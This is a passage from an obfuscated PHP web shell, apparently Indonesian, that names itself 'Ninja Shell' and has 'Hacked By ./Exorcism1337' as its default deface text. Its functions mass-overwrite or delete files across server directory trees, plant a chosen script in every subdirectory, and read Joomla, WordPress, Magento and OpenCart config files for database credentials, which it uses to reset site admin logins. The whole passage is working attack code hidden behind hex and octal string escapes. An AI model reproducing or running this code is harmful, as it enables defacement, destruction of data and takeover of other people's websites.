"\74\142\162\76\74\143\145\156\164\x65\162\x3e\x44\x6f\156\145\40\56\x2e\56\x20\74\141\x20\x68\162\x65\x66\x3d\47\151\x61\137\x63\147\x69\57\x63\x67\151\160\171\x2e\x49\x6e\144\x65\x78\x5f\101\x74\x74\x61\x63\153\x65\162\47\40\164\x61\x72\147\x65\x74\x3d\x27\x5f\x62\x6c\141\x6e\x6b\47\x3e\x4b\154\151\x6b\x20\110\x65\x72\x65\x3c\x2f\x61\x3e"; } } elseif (isset($_GET[hex("\x6d\x61\x73\x73\137\164\157\157\154")])) { $dir = path(); echo "\x3c\x63\x65\156\164\x65\x72\76\74\x66\x6f\162\x6d\40\141\x63\x74\x69\x6f\x6e\75\42\42\x20\155\x65\164\150\157\144\x3d\42\x70\x6f\163\164\x22\76\12"; $dirr = $_POST["\x64\x5f\144\x69\x72"]; $index = $_POST["\x73\x63\x72\x69\x70\x74"]; $index = str_replace("\42", "\x27", $index); $index = stripslashes($index); function edit_file($file, $index) { if (is_writable($file)) { clear_fill($file, $index); echo "\74\123\x70\141\x6e\40\163\164\x79\154\x65\x3d\47\143\x6f\154\157\162\x3a\147\x72\145\x65\156\x3b\47\76\x3c\163\164\162\x6f\156\147\x3e\40\133\53\x5d\x20\116\x79\x61\x62\x75\156\40\61\x30\x30\x25\40\123\x75\x63\x63\145\163\x73\x66\x75\154\x6c\40\74\x2f\x73\164\162\x6f\156\147\x3e\74\x2f\163\160\141\x6e\76\74\x62\x72\x3e\x3c\57\x63\145\156\x74\x65\x72\x3e"; } else { echo "\x3c\x53\x70\141\156\40\x73\164\171\x6c\x65\75\x27\x63\157\x6c\157\162\72\x72\x65\144\x3b\x27\76\x3c\163\x74\162\x6f\156\147\76\x20\x5b\x2d\x5d\40\x54\145\x72\x6e\171\x61\164\141\40\x54\151\x64\141\153\40\x42\157\x6c\145\x68\x20\115\145\156\171\x61\x62\x75\x6e\x20\x44\x69\163\151\x6e\x69\40\72\x28\40\x3c\x2f\163\x74\162\157\156\147\x3e\74\57\x73\160\x61\x6e\76\74\x62\162\76\x3c\57\x63\x65\156\164\x65\x72\x3e"; } } function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\x2e") { if (file_exists("{$dir}\57{$namafile}")) { unlink("{$dir}\x2f{$namafile}"); } } elseif ($dirb === "\56\56") { if (file_exists('' . dirname($dir) . "\x2f{$namafile}")) { unlink('' . dirname($dir) . "\57{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "\x44\105\x4c\x45\124\x45\104\40{$lokasi}\x3c\142\x72\x3e"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } function clear_fill($file, $index) { if (file_exists($file)) { $handle = fopen($file, "\x77"); fwrite($handle, ''); fwrite($handle, $index); fclose($handle); } } function gass() { global $dirr, $index; chdir($dirr); $me = str_replace(dirname(__FILE__) . "\57", '', __FILE__); $files = scandir($dirr); $notallow = array("\x2e\150\x74\141\x63\x63\145\163\163", "\x65\x72\162\157\x72\137\154\x6f\x67", "\x5f\166\164\x69\137\x69\x6e\x66\56\150\164\x6d\x6c", "\x5f\160\x72\151\x76\x61\164\145", "\137\166\x74\x69\137\x62\x69\156", "\137\x76\x74\x69\x5f\x63\x6e\x66", "\x5f\x76\164\151\x5f\x6c\x6f\147", "\137\x76\164\151\x5f\x70\x76\164", "\137\166\164\151\x5f\x74\x78\164", "\143\147\151\55\x62\151\156", "\56\x63\x6f\x6e\164\141\x63\x74\145\x6d\141\x69\154", "\x2e\143\160\x61\156\x65\x6c", "\x2e\146\141\156\164\141\163\x74\x69\x63\x6f\x64\141\164\141", "\x2e\x68\164\160\141\163\x73\x77\x64\163", "\56\154\141\x73\164\154\x6f\x67\151\156", "\x61\x63\x63\145\163\163\x2d\154\x6f\x67\163", "\143\x70\x62\x61\143\153\x75\x70\55\x65\x78\143\154\x75\x64\x65\55\165\x73\x65\x64\55\x62\x79\55\x62\141\x63\x6b\165\x70\56\143\157\156\146", "\56\143\x67\x69\137\x61\165\164\x68", "\56\x64\x69\163\153\137\x75\x73\141\147\145", "\56\x73\x74\x61\164\x73\x70\167\x64", "\x2e\56", "\x2e"); sort($files); $n = 0; foreach ($files as $file) { if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) { echo "\74\143\145\x6e\164\145\162\76\x3c\x53\160\x61\156\x20\163\x74\171\154\145\x3d\x27\x63\157\154\157\162\72\x20\x23\x38\x41\x38\101\x38\x41\x3b\47\x3e\x3c\163\164\x72\157\x6e\x67\x3e{$dirr}\57\74\x2f\x73\x70\141\156\76{$file}\x3c\x2f\163\x74\162\157\x6e\147\x3e\x20\x3d\x3d\75\x3d\x3e\x20"; edit_file($file, $index); flush(); $n = $n + 1; } } echo "\74\x62\x72\76"; echo "\x3c\143\x65\x6e\164\x65\162\76\x3c\142\x72\x3e\x3c\x68\63\76{$n}\x20\113\141\154\151\x20\101\x6e\x64\141\x20\124\145\x6c\x61\x68\40\116\147\x65\x63\162\x6f\x74\x20\x20\x44\x69\x73\x69\x6e\x69\x20\74\57\x68\x33\x3e\74\57\x63\145\x6e\x74\145\x72\x3e\74\x62\162\x3e"; } function ListFiles($dirrall) { if ($dh = opendir($dirrall)) { $files = array(); $inner_files = array(); $me = str_replace(dirname(__FILE__) . "\x2f", '', __FILE__); $notallow = array($me, "\56\150\x74\x61\143\x63\x65\x73\163", "\145\x72\162\157\162\x5f\154\x6f\x67", "\x5f\166\x74\x69\x5f\x69\x6e\x66\x2e\x68\164\x6d\154", "\137\x70\x72\151\166\x61\x74\145", "\x5f\x76\x74\151\137\x62\151\156", "\x5f\x76\164\151\x5f\x63\x6e\146", "\137\166\164\151\x5f\154\157\x67", "\137\x76\164\x69\x5f\160\x76\164", "\x5f\166\164\x69\x5f\x74\170\x74", "\143\x67\x69\55\x62\151\156", "\x2e\x63\x6f\x6e\x74\141\143\x74\x65\155\141\x69\154", "\x2e\x63\160\x61\x6e\x65\x6c", "\56\146\141\x6e\x74\x61\163\164\151\x63\x6f\144\141\x74\141", "\x2e\150\164\160\x61\163\x73\x77\144\163", "\56\154\x61\163\x74\x6c\x6f\147\151\x6e", "\x61\143\143\145\x73\x73\x2d\x6c\x6f\x67\163", "\143\x70\x62\141\x63\153\165\160\x2d\145\170\143\x6c\x75\144\145\x2d\165\163\x65\x64\x2d\x62\x79\55\142\x61\x63\153\x75\x70\56\x63\157\156\x66", "\56\143\147\151\x5f\x61\165\164\x68", "\56\x64\x69\163\153\x5f\x75\163\x61\147\x65", "\x2e\x73\x74\x61\164\163\160\167\144", "\x54\x68\165\155\x62\163\x2e\x64\x62"); while ($file = readdir($dh)) { if ($file != "\x2e" && $file != "\56\x2e" && $file[0] != "\x2e" && !in_array($file, $notallow)) { if (is_dir($dirrall . "\57" . $file)) { $inner_files = ListFiles($dirrall . "\x2f" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dirrall . "\57" . $file); } } } closedir($dh); return $files; } } function gass_all() { global $index; $dirrall = $_POST["\144\x5f\x64\x69\x72"]; foreach (ListFiles($dirrall) as $key => $file) { $file = str_replace("\57\57", "\x2f", $file); echo "\x3c\143\145\156\x74\x65\x72\76\74\x73\x74\x72\157\156\147\x3e{$file}\74\x2f\163\164\162\x6f\x6e\147\x3e\x20\x3d\75\x3d\76"; edit_file($file, $index); flush(); } $key = $key + 1; echo "\74\x63\x65\156\x74\145\162\x3e\74\142\x72\76\x3c\x68\63\76{$key}\x20\x4b\x61\x6c\151\40\101\156\x64\x61\40\124\x65\154\141\x68\x20\x4e\x67\145\143\x72\x6f\164\40\x20\104\x69\163\151\156\151\40\x20\x3c\x2f\150\x33\x3e\74\x2f\143\x65\x6e\x74\x65\162\x3e\74\x62\x72\x3e"; } function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\x2f" . $namafile; if ($dirb === "\x2e") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\x2e") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\133\x3c\146\x6f\156\x74\40\143\x6f\x6c\157\162\x3d\154\151\x6d\145\x3e\104\x4f\x4e\105\x3c\57\146\157\x6e\x74\x3e\x5d\x20{$lokasi}\x3c\x62\162\76"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } if ($_POST["\155\x61\x73\x73"] == "\x6f\156\145\144\151\x72") { echo "\74\x62\x72\x3e\40\126\x65\162\x73\151\x20\124\x65\x78\x74\40\x41\162\x65\141\x3c\142\x72\x3e\x3c\x74\x65\x78\x74\x61\x72\145\141\x20\x63\x6c\x61\163\163\40\x3d\40\47\x66\x6f\x72\155\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x27\40\x6e\x61\155\145\x3d\47\x69\156\x64\x65\170\x27\40\162\157\167\x73\75\47\x31\60\x27\40\x63\x6f\x6c\x73\x3d\47\x36\x37\x27\x3e\12"; $ini = "\x68\x74\x74\x70\72\57\x2f"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}\x2f{$file}", "\x77\53"); $finish = @fwrite($start, $indx); if ($finish) { echo "{$ini}{$row}\57{$file}\12"; } } echo "\74\x2f\x74\x65\x78\164\141\162\x65\141\76\74\x62\162\x3e\74\x62\76\x56\x65\x72\163\x69\x20\124\145\x78\164\x3c\x2f\142\76\74\142\x72\x3e\74\x62\x72\x3e\74\x62\x72\76\xa"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}\57{$file}", "\167\53"); $finish = @fwrite($start, $indx); if ($finish) { echo "\74\x61\x20\x68\162\145\146\x3d\42\150\164\x74\160\x3a\x2f\x2f" . $row . "\x2f" . $file . "\42\40\164\x61\x72\147\145\x74\75\x22\137\142\x6c\x61\156\153\x22\76\x68\164\164\160\x3a\x2f\57" . $row . "\x2f" . $file . "\74\x2f\141\x3e\74\142\x72\76"; } } echo "\74\x68\162\x3e"; } elseif ($_POST["\155\141\163\x73"] == "\x73\x61\x62\165\156\153\141\x62\x65\x68") { gass(); } elseif ($_POST["\155\x61\x73\x73"] == "\150\141\x70\165\x73\x6d\141\x73\x73\141\154") { hapus_massal($_POST["\144\x5f\144\151\x72"], $_POST["\144\137\x66\151\154\x65"]); } elseif ($_POST["\155\x61\x73\163"] == "\x73\141\x62\x75\x6e\155\x65\155\x61\164\151\153\141\x6e") { gass_all(); } elseif ($_POST["\x6d\x61\163\163"] == "\155\141\x73\163\x64\x65\146\x61\143\145") { echo "\74\144\x69\x76\40\x73\164\x79\154\x65\x3d\x27\155\x61\162\x67\x69\156\x3a\x20\65\160\170\40\x61\x75\164\157\73\x20\x70\x61\144\x64\151\x6e\147\72\40\x35\x70\x78\47\x3e"; sabun_massal($_POST["\x64\137\144\151\x72"], $_POST["\144\137\x66\151\x6c\x65"], $_POST["\163\x63\x72\151\160\x74"]); echo "\x3c\x2f\x64\151\x76\x3e"; } else { echo "\xa\x9\11\74\150\162\76\x3c\x62\x72\x3e\xa\x9\11\x3c\x63\145\x6e\164\x65\x72\76\x3c\x68\x32\76\x4d\x61\x73\x73\x20\104\145\146\x61\x63\x65\40\x2f\x20\104\x65\x6c\x65\x74\x65\40\x46\151\154\x65\x73\40\x4e\151\x6e\152\x61\40\x53\x68\145\154\154\x3c\x2f\150\x32\76\74\146\x6f\x6e\164\x20\x73\164\171\x6c\145\x3d\47\164\x65\170\164\x2d\144\145\143\x6f\162\x61\164\151\157\156\x3a\40\x75\x6e\144\x65\x72\154\151\x6e\x65\73\47\76\xa\x9\11\x53\x65\x6c\145\143\x74\40\124\x79\x70\145\72\74\142\x72\x3e\xa\x9\11\x3c\x2f\x66\x6f\156\x74\76\xa\11\x9\x3c\163\145\154\x65\143\164\x20\x63\x6c\x61\163\163\x3d\x22\x66\x6f\162\155\55\143\157\156\164\162\157\154\x22\40\156\141\155\x65\75\x22\x6d\x61\163\163\x22\x20\40\163\x74\x79\x6c\x65\75\x22\167\151\x64\x74\x68\72\40\x34\65\60\x70\170\73\42\x20\x68\145\151\147\150\x74\75\x22\61\60\42\76\12\x9\11\74\157\x70\164\151\157\156\40\x76\141\154\165\145\x3d\42\157\x6e\x65\144\151\x72\42\x3e\x4d\x61\x73\163\40\104\145\x66\141\x63\x65\40\x31\40\104\x69\162\74\57\x6f\160\x74\x69\x6f\156\x3e\12\11\11\x3c\157\160\x74\151\x6f\156\40\166\x61\154\165\x65\75\x22\x6d\x61\163\x73\x64\x65\x66\141\143\145\x22\76\x4d\141\163\163\40\x44\x65\x66\x61\143\145\40\101\x4c\x4c\x20\104\151\162\x3c\x2f\157\160\164\151\157\x6e\x3e\12\11\11\74\157\x70\164\x69\157\x6e\40\x76\x61\154\165\x65\x3d\42\163\x61\x62\x75\156\153\x61\x62\x65\x68\42\x3e\x53\141\x62\x75\156\x20\x4d\x61\x73\x73\x61\x6c\x20\104\151\x20\124\x65\x6d\160\141\x74\x3c\57\x6f\160\164\151\x6f\x6e\x3e\xa\x9\x9\74\x6f\160\x74\151\157\156\x20\x76\x61\154\x75\145\75\42\163\x61\142\x75\x6e\x6d\145\155\141\164\151\x6b\x61\x6e\x22\76\123\x61\x62\165\156\x20\x4d\x61\163\x73\141\x6c\x20\102\x75\156\x75\150\x20\x44\x69\x72\151\74\57\x6f\x70\164\x69\x6f\x6e\76\12\x9\11\x3c\157\x70\164\x69\x6f\156\40\x76\x61\154\x75\145\x3d\42\x68\x61\x70\x75\163\x6d\x61\x73\x73\141\x6c\42\x3e\115\141\x73\163\40\x44\145\x6c\145\164\145\x20\106\151\x6c\x65\163\x3c\57\x6f\160\164\151\157\156\x3e\x3c\57\143\145\x6e\x74\x65\x72\x3e\74\x2f\163\145\154\x65\x63\164\76\74\142\162\x3e\12\11\x9\74\x66\x6f\x6e\x74\40\163\164\171\x6c\x65\x3d\47\x74\x65\x78\164\55\x64\x65\x63\x6f\162\x61\164\151\x6f\x6e\x3a\x20\165\156\144\145\162\x6c\x69\156\x65\73\47\x3e\x46\157\x6c\x64\x65\x72\72\x3c\x2f\x66\157\x6e\164\76\74\x62\162\x3e\12\x9\11\x3c\151\156\x70\x75\x74\x20\143\154\x61\163\163\75\40\x27\146\157\x72\155\55\x63\157\156\x74\x72\x6f\154\47\40\164\171\x70\145\x3d\47\x74\x65\170\x74\47\40\156\141\x6d\x65\75\x27\x64\x5f\x64\x69\x72\47\x20\x76\x61\x6c\x75\x65\75\x27{$dir}\47\x20\x73\x74\x79\154\x65\x3d\47\x77\151\144\164\x68\x3a\x20\64\x35\x30\160\x78\x3b\x27\x20\x68\x65\x69\x67\x68\164\75\47\x31\x30\47\x3e\x3c\x62\x72\x3e\12\11\11\74\x66\x6f\156\x74\x20\x73\164\171\x6c\x65\75\x27\164\x65\x78\x74\55\x64\145\x63\157\x72\141\164\x69\157\156\72\x20\x75\x6e\x64\x65\x72\x6c\x69\156\145\x3b\47\76\106\151\x6c\x65\x6e\x61\155\x65\x3a\74\57\x66\157\x6e\x74\x3e\x3c\142\162\x3e\12\11\11\74\x69\x6e\160\x75\x74\x20\x63\x6c\141\x73\163\x3d\40\47\x66\x6f\162\x6d\x2d\x63\x6f\x6e\164\x72\157\154\47\x20\x74\171\160\145\75\47\164\x65\170\x74\x27\x20\156\141\155\x65\75\47\144\137\146\151\x6c\x65\x27\x20\x76\141\x6c\x75\145\75\47\x45\x78\143\56\160\150\160\47\40\x73\x74\171\154\x65\75\47\167\151\144\164\x68\72\40\x34\x35\x30\160\x78\x3b\47\x20\x68\145\151\x67\150\x74\75\47\x31\x30\x27\76\74\142\162\76\12\x9\11\x3c\x66\157\156\x74\40\x73\x74\171\x6c\145\x3d\47\164\145\170\x74\55\144\145\x63\x6f\162\141\x74\x69\157\x6e\x3a\x20\165\x6e\144\x65\x72\x6c\151\156\x65\73\x27\x3e\x49\x6e\144\x65\170\40\x46\x69\x6c\x65\72\74\57\146\157\x6e\164\76\x3c\142\x72\x3e\12\x9\x9\74\x74\145\x78\x74\141\162\x65\141\40\143\154\x61\x73\x73\x3d\x20\x27\146\157\x72\155\x2d\x63\157\x6e\164\x72\x6f\x6c\47\x20\x6e\141\155\145\x3d\47\163\143\162\x69\160\164\47\40\x73\164\171\154\x65\x3d\x27\x77\x69\x64\x74\x68\72\x20\64\x35\60\160\x78\73\40\x68\x65\151\147\150\x74\x3a\x20\x32\x30\60\x70\170\73\47\76\x48\x61\x63\153\x65\x64\40\102\171\x20\x2e\x2f\105\170\157\x72\x63\x69\x73\x6d\x31\x33\63\x37\74\57\x74\x65\x78\x74\141\162\x65\141\x3e\74\x62\x72\76\12\11\x9\x3c\x69\156\160\x75\x74\x20\x63\154\141\163\x73\x3d\40\x27\146\x6f\162\155\x2d\x63\157\x6e\x74\x72\157\x6c\47\40\x74\x79\160\145\x3d\47\x73\165\142\155\x69\164\x27\x20\x6e\x61\155\x65\75\47\x73\164\141\x72\164\x27\40\x76\141\154\165\x65\75\x27\x4d\141\x73\x73\40\x44\x65\x66\141\143\x65\47\40\x73\x74\x79\x6c\x65\x3d\x27\x77\x69\144\x74\150\x3a\40\x34\65\60\x70\170\73\x27\76\xa\x9\x9\74\x2f\146\x6f\x72\155\x3e\74\57\143\145\x6e\x74\145\x72\x3e\74\x68\162\76\74\142\162\x3e"; } } elseif (isset($_GET[hex("\x6d\x61\x73\x73\137\x75\x73\145\162")])) { if ($_POST["\x68\x61\x6a\141\x72"]) { if (strlen($_POST["\160\141\163\163\x5f\x62\x61\x72\165"]) < 6 or strlen($_POST["\165\x73\145\x72\137\x62\x61\162\x75"]) < 6) { print "\x75\163\x65\162\156\x61\155\145\40\141\x74\x61\x75\x20\160\x61\x73\x73\167\x6f\x72\144\40\150\141\162\165\x73\40\154\x65\x62\151\x68\x20\x64\141\162\x69\x20\66\x20\153\141\x72\141\153\x74\145\x72"; } else { $user_baru = $_POST["\165\163\145\x72\x5f\x62\141\162\165"]; $pass_baru = md5($_POST["\160\x61\163\163\137\x62\x61\162\x75"]); $conf = $_POST["\143\x6f\x6e\x66\x69\147\137\144\151\x72"]; if (preg_match("\x2f\136\x68\x74\x74\x70\x3a\134\57\134\x2f\x2f", $conf) or preg_match("\x2f\x5e\x68\x74\164\160\163\x3a\134\57\134\x2f\57", $conf)) { $get = curl($conf); preg_match_all("\57\74\x61\x20\150\x72\145\146\75\x22\x28\x2e\52\77\51\56\x74\170\164\x22\x3e\57", $get, $link); foreach ($link[1] as $link_config) { $scan_conf[] = "{$link_config}\56\164\170\x74"; } } else { $scan_conf = scandir($conf); } foreach ($scan_conf as $file_conf) { $config = file_get_contents("{$conf}\57{$file_conf}"); if (preg_match("\x2f\112\103\157\156\146\x69\147\174\x6a\x6f\157\155\154\141\57", $config)) { $dbhost = getValue($config, "\150\157\163\x74\40\x3d\x20\47", "\47"); $dbuser = getValue($config, "\x75\x73\x65\x72\x20\x3d\x20\47", "\x27"); $dbpass = getValue($config, "\x70\x61\x73\163\167\x6f\x72\144\40\75\40\47", "\47"); $dbname = getValue($config, "\x64\x62\40\75\40\47", "\47"); $dbprefix = getValue($config, "\144\142\x70\162\x65\x66\151\x78\x20\x3d\x20\x27", "\x27"); $prefix = $dbprefix . "\165\x73\x65\x72\x73"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\x45\114\x45\x43\124\40\52\40\x46\122\117\115\40{$prefix}\40\117\x52\x44\105\x52\40\x42\131\40\151\x64\40\101\x53\103"); $result = mysql_fetch_array($q); $id = $result["\151\144"]; $site = getValue($config, "\163\151\x74\145\156\141\x6d\145\40\75\40\47", "\47"); $update = mysql_query("\x55\120\104\101\124\x45\40{$prefix}\40\123\x45\x54\x20\x75\163\145\162\156\141\x6d\x65\x3d\x27{$user_baru}\47\x2c\160\141\x73\163\167\x6f\162\144\x3d\47{$pass_baru}\47\x20\127\110\105\x52\105\40\x69\144\75\x27{$id}\47"); print "\x43\157\156\x66\151\x67\x20\x3d\76\40" . $file_conf . "\x3c\x62\162\76"; print "\103\x4d\x53\x20\x3d\x3e\40\112\x6f\157\155\154\x61\74\142\162\76"; if ($site == '') { print "\123\x69\164\145\156\x61\155\145\x20\x3d\76\x20" . color(1, 1, "\103\141\x6e\x27\164\40\147\145\164\x20\144\x6f\x6d\141\x69\156\40\x6e\141\155\145") . "\74\142\x72\76"; } else { print "\123\x69\164\x65\x6e\141\155\145\x20\x3d\x3e\x20{$site}\74\x62\162\76"; } if (!$update or !$conn or !$db) { print "\x53\164\141\x74\x75\x73\40\x3d\76\x20" . color(1, 1, mysql_error()) . "\x3c\x62\162\76\74\142\162\76"; } else { print "\x53\x74\x61\x74\165\163\x20\75\x3e\x20" . color(1, 2, "\163\x75\153\163\145\x73\x20\145\144\151\164\40\165\163\x65\x72\x2c\x20\x73\x69\154\141\x6b\141\x6e\x20\x6c\x6f\x67\151\x6e\40\144\x65\156\x67\141\x6e\40\x75\163\145\x72\x20\x26\x20\x70\x61\163\x73\x20\x79\141\156\147\40\x62\141\x72\165\56") . "\74\x62\x72\76\x3c\142\x72\x3e"; } mysql_close($conn); } elseif (preg_match("\x2f\x57\x6f\x72\x64\120\x72\x65\163\163\57", $config)) { $dbhost = getValue($config, "\104\102\137\110\x4f\x53\x54\x27\x2c\40\x27", "\x27"); $dbuser = getValue($config, "\104\x42\137\x55\x53\x45\122\47\54\40\x27", "\x27"); $dbpass = getValue($config, "\x44\x42\x5f\120\101\x53\123\127\x4f\122\104\47\x2c\x20\x27", "\x27"); $dbname = getValue($config, "\x44\x42\x5f\116\x41\x4d\105\x27\x2c\40\47", "\x27"); $dbprefix = getValue($config, "\x74\141\142\x6c\145\x5f\x70\162\145\146\151\x78\40\40\75\40\47", "\47"); $prefix = $dbprefix . "\165\x73\145\162\x73"; $option = $dbprefix . "\x6f\x70\x74\151\x6f\x6e\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\105\x4c\x45\x43\x54\40\52\x20\x46\122\117\115\40{$prefix}\x20\x4f\122\104\x45\122\40\102\x59\x20\151\144\40\x41\123\103"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\123\x45\x4c\x45\x43\124\40\52\x20\x46\x52\x4f\x4d\40{$option}\x20\117\122\x44\x45\x52\x20\102\131\x20\157\160\164\x69\157\156\137\x69\144\x20\101\123\103"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "\114\x6f\x67\x69\x6e\x20\x3d\76\40" . color(1, 1, "\103\x61\x6e\x74\47\164\40\147\x65\x74\x20\144\157\x6d\141\x69\x6e\40\156\x61\155\x65") . "\x3c\142\x72\76"; } else { $url_target = "\x4c\x6f\x67\x69\156\x20\75\x3e\40\74\x61\40\x68\x72\x65\x66\x3d\x27{$target}\x2f\x77\x70\x2d\x6c\x6f\x67\151\156\56\x70\x68\160\47\40\164\x61\x72\147\145\x74\75\x27\137\142\154\141\156\153\x27\76\x3c\x75\76{$target}\x2f\x77\x70\x2d\154\157\147\151\x6e\x2e\x70\x68\x70\74\57\165\x3e\x3c\x2f\141\76\74\142\162\76"; } $update = mysql_query("\125\x50\x44\x41\x54\105\40{$prefix}\x20\x53\x45\124\x20\165\x73\x65\162\x5f\154\157\147\151\156\x3d\47{$user_baru}\47\x2c\165\x73\145\162\x5f\160\x61\163\x73\x3d\x27{$pass_baru}\47\40\127\x48\x45\122\x45\40\x69\x64\x3d\x27{$id}\47"); print "\x43\x6f\x6e\146\151\x67\x20\x3d\76\40" . $file_conf . "\74\x62\x72\x3e"; print "\103\115\123\40\x3d\76\40\127\x6f\x72\144\160\162\x65\163\163\74\142\x72\76"; print $url_target; if (!$update or !$conn or !$db) { print "\123\164\x61\x74\165\163\x20\x3d\76\40" . color(1, 1, mysql_error()) . "\74\142\x72\x3e\x3c\142\x72\76"; } else { print "\123\164\x61\x74\x75\163\40\75\76\40" . color(1, 2, "\163\165\x6b\x73\x65\163\40\145\144\151\x74\40\x75\x73\145\162\54\40\x73\151\x6c\141\153\141\x6e\x20\x6c\x6f\147\151\x6e\40\144\145\x6e\x67\141\156\x20\165\163\x65\162\40\46\x20\x70\x61\x73\163\40\171\x61\156\x67\x20\x62\x61\x72\165\x2e") . "\74\142\162\76\74\x62\162\x3e"; } mysql_close($conn); } elseif (preg_match("\57\x4d\x61\147\x65\x6e\164\157\x7c\x4d\141\x67\145\x5f\x43\157\x72\145\57", $config)) { $dbhost = getValue($config, "\74\x68\157\163\164\x3e\74\41\x5b\103\104\101\x54\101\x5b", "\x5d\x5d\x3e\74\x2f\150\x6f\163\x74\76"); $dbuser = getValue($config, "\x3c\x75\163\x65\162\156\141\x6d\145\x3e\74\41\x5b\103\x44\x41\124\101\x5b", "\x5d\135\76\x3c\57\165\x73\x65\162\156\141\x6d\145\x3e"); $dbpass = getValue($config, "\x3c\x70\141\x73\163\167\157\x72\144\76\x3c\x21\133\x43\104\101\x54\x41\133", "\x5d\135\76\74\57\x70\141\x73\x73\167\157\162\x64\76"); $dbname = getValue($config, "\74\x64\x62\x6e\141\x6d\145\76\x3c\41\133\103\x44\x41\124\x41\x5b", "\x5d\135\x3e\74\x2f\x64\x62\x6e\x61\x6d\145\76"); $dbprefix = getValue($config, "\74\164\x61\x62\x6c\145\137\160\162\x65\146\x69\x78\x3e\74\41\133\103\104\101\x54\101\x5b", "\x5d\135\x3e\74\x2f\164\141\x62\x6c\x65\137\x70\x72\145\x66\151\170\76"); $prefix = $dbprefix . "\x61\144\x6d\151\156\137\x75\x73\145\x72"; $option = $dbprefix . "\143\x6f\x72\145\x5f\x63\x6f\x6e\x66\x69\x67\x5f\144\141\164\141"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\x45\114\105\x43\124\40\x2a\40\x46\x52\x4f\x4d\40{$prefix}\x20\117\x52\104\x45\122\40\x42\131\40\x75\x73\145\x72\x5f\x69\144\40\x41\123\103"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("\x53\105\x4c\x45\103\x54\x20\52\40\x46\122\117\x4d\x20{$option}\x20\127\x48\105\122\x45\40\160\141\164\150\75\47\167\x65\x62\57\163\145\143\165\x72\x65\x2f\142\141\x73\145\x5f\165\162\154\x27"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "\x4c\x6f\x67\151\156\x20\x3d\x3e\40" . color(1, 1, "\x43\141\x6e\x74\47\x74\40\147\x65\x74\40\144\157\x6d\x61\x69\x6e\x20\x6e\141\x6d\145") . "\x3c\142\x72\76"; } else { $url_target = "\114\x6f\x67\151\x6e\40\75\76\x20\x3c\141\x20\150\x72\145\x66\x3d\47{$target}\57\x61\144\155\x69\x6e\x2f\47\x20\x74\x61\x72\x67\x65\164\75\47\x5f\x62\154\141\156\153\x27\x3e\x3c\x75\x3e{$target}\x2f\x61\x64\155\x69\156\57\74\x2f\165\76\74\x2f\141\x3e\74\142\x72\76"; } $update = mysql_query("\x55\x50\104\101\124\x45\40{$prefix}\x20\123\x45\x54\40\165\x73\145\x72\156\141\x6d\x65\75\47{$user_baru}\x27\x2c\x70\141\x73\x73\x77\157\x72\144\75\x27{$pass_baru}\x27\40\127\110\x45\x52\x45\x20\165\x73\145\x72\137\151\x64\x3d\47{$id}\47"); print "\x43\157\156\x66\x69\x67\40\75\x3e\40" . $file_conf . "\74\x62\x72\76"; print "\x43\115\x53\40\x3d\x3e\x20\115\141\147\145\x6e\164\x6f\x3c\142\162\x3e"; print $url_target; if (!$update or !$conn or !$db) { print "\123\x74\x61\x74\x75\163\x20\x3d\x3e\x20" . color(1, 1, mysql_error()) . "\x3c\142\162\x3e\x3c\x62\162\76"; } else { print "\123\x74\141\164\x75\163\40\75\x3e\x20" . color(1, 2, "\163\x75\153\x73\x65\x73\x20\x65\144\x69\x74\40\165\x73\145\x72\54\x20\163\x69\154\141\153\x61\x6e\40\154\x6f\147\151\x6e\40\144\x65\x6e\x67\141\156\40\165\163\145\162\40\x26\x20\160\141\163\x73\x20\x79\141\x6e\147\x20\142\141\162\165\x2e") . "\x3c\142\162\x3e\74\x62\x72\76"; } mysql_close($conn); } elseif (preg_match("\x2f\x48\x54\x54\120\x5f\x53\x45\x52\126\x45\122\174\x48\x54\x54\120\x5f\x43\x41\x54\101\x4c\117\107\x7c\x44\x49\122\137\103\x4f\x4e\x46\111\x47\174\x44\111\122\x5f\123\131\123\124\105\115\x2f", $config)) { $dbhost = getValue($config, "\x27\x44\x42\x5f\110\x4f\123\x54\x4e\x41\115\105\x27\54\40\47", "\x27"); $dbuser = getValue($config, "\x27\104\102\x5f\125\123\x45\x52\116\x41\115\105\47\x2c\x20\x27", "\x27"); $dbpass = getValue($config, "\47\x44\x42\x5f\x50\101\123\x53\x57\x4f\x52\x44\47\54\40\47", "\x27"); $dbname = getValue($config, "\x27\104\x42\137\x44\x41\x54\101\x42\101\x53\x45\47\x2c\x20\x27", "\47"); $dbprefix = getValue($config, "\x27\x44\102\137\120\122\x45\x46\x49\130\47\x2c\x20\x27", "\47"); $prefix = 